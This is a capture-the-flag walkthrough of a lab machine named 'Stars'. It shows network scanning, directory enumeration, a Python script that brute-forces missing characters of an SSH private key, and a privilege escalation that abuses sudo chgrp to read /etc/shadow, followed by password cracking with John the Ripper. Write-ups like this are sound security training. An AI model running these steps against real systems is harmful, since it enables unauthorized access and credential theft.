Stars

To begin with, we obtain the IP of the victim machine using the following command:

arp-scan -I eth0 --localnet

And now we perform a quick scan of all its ports to see which ones are open.

nmap -sS -p- --min-rate 4500 -n -Pn IP

Now we conduct a more detailed scan of those ports.

nmap -sCV -p22,80 -n -Pn IP

We scan the open ports

We enter the website hosted on this machine and come across the following text:

Homepage

I decide to list directories and files using the Gobuster tool, and we come across a .txt file that gives us a clue.

gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,php -t 130

Hidden text file

Content of sshnote.txt

We also obtain a possible username.

The next step is to use Burp Suite, where we come across a Cookie that appears to be text in Base64 format.

Cookie in Base64 format

We decode it, and this is the result:

echo "cG9pc29uZWRnaWZ0LnR4dA==" | base64 -d

We decrypt the Base64 encoded text.

It turns out we have found a new hidden file on the website. It seems to be the private key for SSH access.

Private key

But it seems we can't use it yet, as sshnote.txt file mentioned. I create a file called id_rsa.txt with the content of the private key and decide to quickly create a program using AI to automate the process of combining and testing the private key until eventually one combination is correct. Here's the code:

import subprocess
import itertools
import os

# SSH credentials
ip = 'IP'
username = 'sophie'

# Path to the file containing the private key
private_key_path = './id_rsa.txt'

# Read the private key from the file
with open(private_key_path, 'r') as file:
    private_key_data = file.read()

# Generate all possible combinations of uppercase letters
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
combinations = itertools.product(letters, repeat=3)

# Iterate over the combinations and try SSH with each one
for combo in combinations:
    key = ''.join(combo)
    # Write the key to a temporary file
    with open('temp_key_file', 'w') as key_file:
        key_file.write(private_key_data.replace('***', key))
    try:
        # Change permissions of the temporary key file
        os.chmod('temp_key_file', 0o600)  # Permissions only for the owner
        # Execute SSH using the temporary key file
        ssh_command = f'ssh -i temp_key_file {username}@{ip}'
        subprocess.run(ssh_command, shell=True, check=True)
        print(f'Successful SSH connection using key: {key}')
        os.remove('temp_key_file')  # Remove the temporary key file
        break  # Stop the loop if a valid key is found
    except subprocess.CalledProcessError:
        print(f'Error: Authentication failed with key: {key}')
    except Exception as e:
        print(f'Error: {e}')

Finally, we give permissions to the file, execute it, and we're in:

chmod +x auto_ssh.py

We are Sophie and we have the user flag

And we obtain the User Flag.

Now, with the command "sudo -l" we observe that we can execute the chgrp binary as the root user with sudo without a password.

Let's see how it's used with the following command:

sudo -u root /usr/bin/chgrp --help

So, we can change the group of the files we want. What I do is change the group of the file /etc/shadow to sophie.

sudo -u root /usr/bin/chgrp sophie /etc/shadow

We open it with cat and copy the line where root is located, then paste it into a file on our local machine named shadow.txt. Now, we'll open the file /etc/passwd and do the same as before, but copy and paste the content into a file named passwd.txt.

Now, let's decrypt the root user's password. To do this, we'll use unshadow and John The Ripper:

unshadow passwd.txt shadow.txt > unshadowed.txt

john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

And we find the root password:

Root user's password

Finally, we access root and obtain the Root Flag.

pwned